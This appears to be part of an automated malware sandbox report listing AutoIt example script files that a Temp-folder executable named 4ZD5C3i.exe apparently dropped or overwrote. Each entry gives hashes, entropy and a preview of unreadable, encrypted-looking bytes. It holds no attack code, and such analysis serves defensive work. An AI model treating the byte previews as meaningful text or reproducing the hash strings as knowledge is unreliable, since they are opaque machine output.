                                                                                                                                                                                                                                                SHA-512:90C30CE03AE1013E80971F64C33E269E2877DDC980F1B50160C324F8598FFE4A802C533AA254ABF01FFC225B443FA88542ED50FAEDAEC0777DB7167B9BBE59E1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....r&cJ...[..Qh................&..^.{F.....<.'..&n..6"eMh..}.g.....=..=...../!.hULv[Ih...BM\<0O.|.a.4*(O..1~..Y.n..7.xoyj..~P}..P...KC;Ql.p..}.[..`.1...l@.H..6.y.{....}n...P..U,....7....U.,8*.\.\B..3..aP...aQ..~..........GLE.:UIJ.Y.s6..X....pl...w....j041...p...OcJm..X.>..7...[.vp...c...[O/....-.(.SM.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..7.2..$&.\....6..!P.....x.1u.2=W.)?...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateToDayOfWeekISO.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):885
                                                                                                                                                                                                                                                Entropy (8bit):7.742688992086056
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VLS9ofMKUL3NQjjmJrc0YXUZtwsTqyyHn:VLlMKSw4o0jZtwsyHn
                                                                                                                                                                                                                                                MD5:EC77C675538109CAA1316483C0A7AAD7
                                                                                                                                                                                                                                                SHA1:C8018F39DA1DCFDE9C721538B8E00BFE3EB653F0
                                                                                                                                                                                                                                                SHA-256:1BA7C988B1A25430C7C5B4B844AAF1D2B29CFF60CE451B45AAC4B2E2B1635DD8
                                                                                                                                                                                                                                                SHA-512:D788525561BE3A346952394E84F9F9B0D464CB7457D194FA6A1EFC36E33620E025AA315D0BA80E6D5238E13721D691CB5397FF22373A8A7130277A4EF51EC8F1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..Q&..ZK+~.J..$`.o@.GS)~........u..x.....v....,.P........b..i...k.cy.`J9y..mEz.....u.s.lQ>6..BEP|A.-?..Z.....N........8me...cy*..^.IFZ.H+_[U%V.>...5V.o.X0..}...N..t....?..T.eB...;....RZ...T...$.../......'Y......,..3..s.Q.M+.>.4.O...y...Lz3e..u?|].*$....H.3..T.[. ....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.c.);.X.X.3.B.-..3.Lu9...}.^.."%.. ....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateToDayValue.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):989
                                                                                                                                                                                                                                                Entropy (8bit):7.797043629454486
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:8luVrQJgSVVItJGWbm5M18dYaRMYPZqSRaHjaGJYIsS+WwgHIc0jmksXU4HrkW67:8w8OJbbIdyGRMjmJrc0YXUZtwsTYXg
                                                                                                                                                                                                                                                MD5:C81BFC53474C5AB8B11F5361AAAA2D84
                                                                                                                                                                                                                                                SHA1:AE92F3E073738D88A2687C5A4D54026925C735FD
                                                                                                                                                                                                                                                SHA-256:EBC363E135398FAEA6B8F247F15735BB00E929B34E3F1D3B8BA8E556033B71AD
                                                                                                                                                                                                                                                SHA-512:1920975A7B99C1A195EC2DBD8A1868063CE3C2FA137014B3C3FD0925ACE2631BD977E3996E50F8ADCBDCECE96E0F4B1EAB184382C534FA7B3C9BB666801D4444
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....t...t..8.`..b..Y.[}.(.*...K_.M...?...h.c....X<>p.....[a.e|....6`.:.....KR"...Q..Q.l/..m.I..=.&l.*[..K..D .k!.}.<jlTCC$?.Pm!.^.+.f!.....L`............[......8l.~!.^.j.Y@..Ns&..........n...ar%g........c.......s......?..\,:.>t.0E.!..Y.6..&.#E.`...=...YF..k......U..o^..!.GS.X!.'.V../...." ZJe.t.O"......M.I....TB..).x.y>Or......&7.sy....n?e...h.a>...._.;.G.L?....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$....%........5..^...D...dj....2.Ti.}...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_DateToMonth.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):941
                                                                                                                                                                                                                                                Entropy (8bit):7.74690008397193
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:h3VdDEAy0llzmmLnwL074ZQ8gl+gjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qJ:LdDEUTzmenwzQggjmJrc0YXUZtwsTvG
                                                                                                                                                                                                                                                MD5:A5C081F8153F6B6762405865DABE8725
                                                                                                                                                                                                                                                SHA1:6700592C18F40D631F8FD2A8889CB8667BE8FAC6
                                                                                                                                                                                                                                                SHA-256:943E28AB94CECBAF69100A1BC11AAC4B7C4ABE5E387FF8F5C430AADA8376EC9B
                                                                                                                                                                                                                                                SHA-512:EC07D69F9D6C9AF181F27AA711FAD846D91600895A6472B1D335B5560520335688FF5386F9BB8BBED0EAB53659DA1A4756426BFEE6ED91CED95BCC86444AF850
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.3...C.Pr.d.7...L..F..*..8y.....6....Z...".....$!E..#..8Qk.}n.=N..._H.....;Wd.&..Y]2Z.J..^C...j..\+..;...m..gW.$.S.8J.&....yZVVh..TQ ?Fw...FD.2..@.n....9 ...21...$;3QS2...r....fW......]..yKh._.....]...h.....MT\.~..+6..fR.y.EM.Ziy..F.;.>5iU...8.....v.!..yG?&..d.p.x!m...6#.V...7.I.Y."...D\.+.?.5..J}.y.\^cw..P.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.B~l....#.i.#.M....Uhdmxek..3$9P"M...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_DOSDateTimeToArray.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1481
                                                                                                                                                                                                                                                Entropy (8bit):7.848286491278306
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:BzRRFuLkxevNZM+A5eg34NcfJ1Bf8m0Q3jmJrc0YXUZtwsTpUY:FPFbxevN6+AINN61BX4o0jZtwvY
                                                                                                                                                                                                                                                MD5:422553462FFF5EE54C4E71B8799FB56E
                                                                                                                                                                                                                                                SHA1:E519ABC3FD5D429BE2531F6FF097B36E9D30C533
                                                                                                                                                                                                                                                SHA-256:4827CA713E10475E9F801FDB9F50B82A8A67B39BE61BD4F725CD36C2BD722950
                                                                                                                                                                                                                                                SHA-512:F5ECE8579FAB60431F2549C594A73422660997C1368B3CDC9A3B31298232BE5CA5C1012AF25FF14EEEEF43C1AF8055431F73E344B37A5F3ED8EC1DDCF7091C31
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.9."n/.{./.Z....2.+.. =..r...-..^.$.m6.c.$...0P..#Ue)(..v..?.~...l......eaU1a.zD.r.....I..v..Q.uHy..x...,....J=..G..tj..!.p.b...`.fi..Y.%.....T....$X..Ob...%...z#..3.~.'W.......c&....:..{/l.R\..>..D.......L.u....o..za..zgoz.IrGFQ...k`e.q...L.1;.d..M|s...O ..|..0...5..<...H.&././?`~...d..B..l....1TC...<.6'".LG.CFC....u..o.....wM..k.Vv...f.5|.t...R..2.)...........|..Z.._.z.....D......S...z...;..7c..$r....2G...J.....(.6.;.Eh(G?.iR+.SB.~....5+C/V. ...?k..xI(..y%=q{..#.l.......`..o...Lb.5|E$o.MD..wt......... ...J.M.-.x?...^.....q..M.P...s{.u..%.,..7...^...........+.5...k..L9....F.#n..s..G.....FO*.{..ZH....G.N.-*.]2.sj..s.."e....E...'.ro.&:\. .r-d.2.z.g..8.%..\...TZ!:.....<.c.......^...H.....3B.....:..s.#.N.i.9*.i.tc...74..xJ..#. .iH..-.D.D._.I..g..4...r1>ms.=E..v..R2}.G......I.v",.{A.0v........i.(.i.~...99...]..z`.M.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_DOSDateTimeToFileTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1656
                                                                                                                                                                                                                                                Entropy (8bit):7.860362901322208
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:OhavX3AwZzV91R8JWZWB0GGo6j6w7E0H1V+k0sGMjmJrc0YXUZtwsTe2w:uavAOHkWZZa6R77+04o0jZtw3F
                                                                                                                                                                                                                                                MD5:D2F88CE3B763B9721F62443EE2A60AF5
                                                                                                                                                                                                                                                SHA1:9FBA8A64F3C796F5949262A12F961DEBC4F77DEA
                                                                                                                                                                                                                                                SHA-256:A5A3A4B4359B9AC16E93DFE71FD5999FF18403137EE13F9F9FD0E38FEA99B6AE
                                                                                                                                                                                                                                                SHA-512:A4A71291EEE5DC878DEAD1ED17EB393F049C4F71B8B37ED0FB77C1758BA6C1A38D17D4EFEC71D2C187A612A9A0140379492C3E71278652161F938F843BB8F2A6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...c.h@.I5<._5,;..u..b...b.[....?....|...K..W7..........|...#9v[.....i,r...,.l.w..1...y..e......F._czf?.%B7<.r..D.......8.)..@...[.v..+w.n..&W^..n'.(8{.I..e.c.#8....5|.._..)Uy.<.......%.F.....[...lh....l/..U.x..9....f...~...$..o.G9.I....N[Q$...:.]..N.'jG..h...^`.QZ...m.%.....c/....Q.'...$*..)m...}7y..-......3.........]v....O.g .|m...&..%.:.g.....T.........pd.-E."./..WT.e."..aR..'...?..R...U{......[-...4G.X..u.:...Q...K....0.%...\..K..6....G.. a..ENa.F.*\..q.*.`....3-(.[$..)Q.%=..:ikI..=...(D7E@..t......B_49.}...N.....Z.~.v...=Y..$...TB*.@..s.H...Tk...%t.....}x/r}.+O...z..e.v..F.uLC.y.|,ZE..5...9...>l.I.xm.6........7G.{.....*.....jJ7+.UXK.z.\.A...L._..]..>.=[.....}..9.v.S.Lq?x..?R.p/Nb.... .Lh. +P.6..>..l...^.S...w.H9..w.E.^.....I.''y....Vd..Z.....-og..d......._.'.,.UkO..S..v.V9@.L.R.!>..yU....U.j.~.he..+Y.mz..........0z..t.....(.4....Sz.?X6Q8.~T.b.....$....9............^.....nv.W3?DK.}.&.b6....'.9.TL..."..*........:.mn.iH.l...I

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_DOSDateTimeToStr.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                Entropy (8bit):7.837521539443612
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:IEkUdau4UVWIxMj7Wnc0jcEk7Tt27OOLSvbvOb12iKjmJrc0YXUZtwsTk:FHda8COnZcEk7Tt27OOLSzWbUZ4o0jZa
                                                                                                                                                                                                                                                MD5:EB8240458C15A5594B8350CC1B6936EC
                                                                                                                                                                                                                                                SHA1:D4B3575B54A12F3085170EB071764DA10B8532DA
                                                                                                                                                                                                                                                SHA-256:231FA9182A7F03089685E79AF38E66F6F324A6C3816D86541760083785926E4C
                                                                                                                                                                                                                                                SHA-512:6D023AAB75711AE203F2E98D3B2200E7A161757F33A6CB1238D80C06C04B2E7EEDEA1332CB445A0571B4A81467B8D372EDFA4A5090F75F1BAF9FAC5B5429AEC0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..e~_....\g\5.YQ..Bg..^.V.e....FS......d.nz+.k.Q......U14...ns.R..,...A...}}.q..........D...y.6.~6.EM.C$.e.O..2.m(.{.]..a..Y3..n..P..nd..})..@%z'..3p7.+..y..qv4<.<.O(.T,.&.c..]..C.E.`.-wWe8.i.C.W..Nf.5>..*.J<....."F...........W.._@vZ.k....x/.YiNS.............9nQ..Z.gme..C...?'5...1.T..i.4.#........U.3]..B..?..}/.*.0t.<.|.A........<k[...sxqL.tb...]8......POE..j..1..O...o..u.p#.....i=.4H....Y.|bH...=R;G.4.|...8!......W.TIJ....>.....dJ..0...........p}...s..g.Q..n...~.F......}5.Of..Bk.C.."..jK..[L.....X.9..lk..D.&q.B...#.2....ja..I....t...6.9...7k!.......Y..`..^..d.p..J~.5..N....Y$ZR.v&.;J.....Pi.}'..+.A..W.r..C#E.z.....`W.=.`..[..%.. .B<K..omO.h.~.....8Z...>.....w93%Po..E.h1....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_DOSDateToArray.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1361
                                                                                                                                                                                                                                                Entropy (8bit):7.84134956432118
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:OtwbTcfBKnnF6A4yV7PQQ/N1jq2XjmJrc0YXUZtwsTe:OFwngyV7YAN1jJ4o0jZtwh
                                                                                                                                                                                                                                                MD5:E87E43EE32337DB24065DB974997D640
                                                                                                                                                                                                                                                SHA1:4B37EAE3AEF34B5D82985DC834AC73F810B6771F
                                                                                                                                                                                                                                                SHA-256:EFDD0E6ADFA9B3E5F0AF7C1C9ACEB5B80414DFD3B81ECE6318D6D23D0708D233
                                                                                                                                                                                                                                                SHA-512:6E1D753B541010F2C2D202FF9F8E65341B74D9C95FBFD429FB846C29309DA6EBE55591C8D84E3A543454C8D8F5C0BE2EAC4CB05FEE6CFB7245A1E7BD2380B44E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.K.a$.L.f..a1.6..}......-/..2.T_M<0..s....M.p'. ...B'#..*..\.}&....m.....S.>..?..[>?.s*..]U..r.2jUA.ek..`A......c.........t.......8...K}.......pp=..{"E.}'.C(1.6 ...v..~.q.{.|.x..<2..S........U!...c...1.DC.?.)U..w/)L.W.T.O:...45.\...$..JdtE~.7.:.;.t..M..JY....!eN.......p.......n. {...g.....R`C.l1D..lX....J...?n.P.|Mx...[.........K........s@..D:....".w.H.Z......r...m....4o..F.....j...Zxnn.B..^...Xe2.{$.?.0e....cP.Y..Yr6.C.>......u.{,.0.....M.......ND.....X.v.aq.b<..=a.....y...o..v..na..g......1q..:.....50.l-i....D.....m.........-Yb...D..s.."....#...E....C...\.....1.|Nh}...R..,.....@/Y....T.]..1..!......o...C.w.+.....,..r%u2z..f..'..,.....`..........'..O.},1..Q.[h.$.M.hn.%i....u.........YS./O.j$r..w..k|..cu.L.u.}.AI..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y.......

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_DOSDateToStr.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1302
                                                                                                                                                                                                                                                Entropy (8bit):7.847198058408622
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:mR/xOm72rZ0Xah9yAsTbS+CYW9jmJrc0YXUZtwsTS:mRMrZUah9tsTbpSF4o0jZtwd
                                                                                                                                                                                                                                                MD5:FF453C05FD9F517AF2881547E180F1C9
                                                                                                                                                                                                                                                SHA1:286392ED6B2BFF68716B3BFE2A92B7C5D6619C99
                                                                                                                                                                                                                                                SHA-256:0C04166D3865851B2A223851F4C7FFFAE24FE538175D6F8947458AD152B8FEAB
                                                                                                                                                                                                                                                SHA-512:06E3697971073FEB2FB42818B66ACBD13FC4613A5B07AC46EDC3066D99CB336B82A8BEC4368DA6B8135A76C79EF93B74AB7EB36A3BDAA69812BC554CA1ABB582
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:f4.^.....Bt...l..zo.Z...%oK2i..'..3...3....-......Y6......o....#..-(_...........b.{....X.q.:..Q....1?.U/.?.J..$E.J.#..<..u2?b-/..(k..w.lQ.K..RcY. ....(.CfP....="8........-...g7......s..M...R.(......(P.-I(....).= .ea..S.2..LNE..7.....B?....4.f!MR...^I.W.O0.H.^t2........}..D1..%...z....w.`Y.i...Y.....d..c...W.....'o5../.QI#.....,U.a.iu?...XA2[...vb.....,....O.T.#o..&..F.Q.qhO..-m..~.I...M..e.f..g<....I......6...v.&.Q.N....<D.r.V....'.q.5{..f..S.11..1W!n.....<...Xz..B._I%.=........G/..`...e}.T.\"j..(.n8.N.iS.!t.'.A'.e...\q..s...6.b....r..,.a..=G..Rb....Z.....|@G..Y..%!....8...Y......".9...+....y-.-..;y...?tH....'...G.._..@.:...`g.......K.......9.S.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_DOSTimeToArray.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1359
                                                                                                                                                                                                                                                Entropy (8bit):7.842536543177428
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:/7t5IgazzK/yojfMzt6Relrla4QjmJrc0YXUZtwsT+3GAH:jt5IdzK/rMzbq4o0jZtwPGi
                                                                                                                                                                                                                                                MD5:645410612DB58D224D2BCD2429005E78
                                                                                                                                                                                                                                                SHA1:D54FBC92B851B766C422A4C42A2DCDA85680E3AA
                                                                                                                                                                                                                                                SHA-256:4B58D629D18BAA65F3ABCA9BF8E60647B3CE90535BDBAFFD303774D2D79D3661
                                                                                                                                                                                                                                                SHA-512:FAD3944AB7953B435F8BB9386E71CA7C71D2072C36C5DC866BBBE73E1D4AF6AF0E33622060835BE74535B590A950E708E2E8F3E18C17340E2273A50D8A8FC43D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:s...Z..1.../..OI...J.S..n@...T.!}....X..elA.....x5.....1.9B2L..6...j....?....F.$d.E.\m..6....).D#=.L.9.s:.I../....."Z..@.I...5a...p..\.....T.....J.].."U......p.DvJ.E.k.i.f....../...M<.n!....[.=.&<...Q+. .....6JD.@N.q.7Z.......*......9.c.......e#.......M..@z..C..._T..L&.....f8-.Ws.N.....2...Qv.VO..c.f.....m:W...t..........k}..M..#Q......a.Ux......B.>fL. r.T..n.j.1.....M.+. .V...#..J "<x......U.)S.."&.-jH...)x....r..c...7...Eb..a..s.q...l+.m..**.n....q....G..>g|...k..v.}%MJVg......[......L....M....{.................c...2Yru...,.z....W|.=.%.)_d\.ef.....]1S/........ ....u...Yh...6.v.{h_....Z..v....{;...7.,A..a.x.?.c.\.........dh.VE.....8..%g.9Q......[C.........])' $.*x.A.."....N..%4=.}.....C.@).....\...eT.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y.........

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_DOSTimeToStr.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1300
                                                                                                                                                                                                                                                Entropy (8bit):7.841504140227934
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Qrg6P6tSC4Oj1YlhYPUHFqBHKIYhxcn8gjjmJrc0YXUZtwsTO:W/y0Mil+PUcZKITn4o0jZtwl
                                                                                                                                                                                                                                                MD5:CAB0CD2133EC21B4926777B6B22F564F
                                                                                                                                                                                                                                                SHA1:F78648F86A2A73B24C467C1C36A67639D5C077CF
                                                                                                                                                                                                                                                SHA-256:14F22D8C963217A29BB5DF1D473816E41369A268972B0D5A9EF42744B4FEB55E
                                                                                                                                                                                                                                                SHA-512:71381BAFF0856006695DDF8EE6DE6AD3A714569BCC39C65B3C2ACB26B65AD125F8D4A26BAAC44340CDF151CE9BA3B9CAFBEFFAB3D21BDFF16DCC10A5C59B496E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......U....k...'.Wk!5.U^.O.=.y...=.p7C#.~.Lf,3N....3...na.*...K8.Q..*k1G.V.G.`h.......K..."..<./..]?..|.d......}....0A..]....Q..r'.....D......P}3w..(.....z..a.-.n..+iM%rWp.u..."8]}...ku.V.?f.~4.....Ai.x.93%.Q(.R...JO._.....*.}...f..*"...E*B5p...fF.-q.4..`....sN.C.Y+.=...d.,..E...~.^..7.a.0).:T...>2b3.A..y)...7tEh...Y.KN...5.D..-KF..j...9&..|a.|U.h.Z.i.J..r+4.'.YN..........v.H..,+......7..z~t.^V.s:=.c^.h.y>x.pk.'...F...c.........D..X..&.Rh.U...[.&}..^.....hE....-..-c.......Ul...$...I@.y.2...._..L.S9K...>.8,n.u..D.....;.d...z..v......Q....}..^_.....H*._.9....yz$...8Wcn".........].......k..Oc; ....i..,....q.....qc..n3L..9n....R.u.........dp.&xK.=.ZjT.V."{h..>..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_Date_Time_EncodeFileTime.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1362
                                                                                                                                                                                                                                                Entropy (8bit):7.818263319157543
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:X9JRPY3lNC19nBytR9cGGZZRP7sZ7pmwNjmJrc0YXUZtwsTO3/:toanBu3OjmEu4o0jZtwzP
                                                                                                                                                                                                                                                MD5:296660A4B23846E36DD449644AC466C6
                                                                                                                                                                                                                                                SHA1:19CDE5EF215D0A894AA056784FC4645469FBD94C
                                                                                                                                                                                                                                                SHA-256:A2FD99DF920BDABE56593C264A3DC42AE0F5B5C8457A353024FEE5E0716E4B73
                                                                                                                                                                                                                                                SHA-512:69C12E401F9F277A00F20716A9076C07D655618773B84C321C854C077D77A4E90ADD5BE5A088115D2948CFBB99AF72198690B3F33FD99C71B26FB0520222211D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
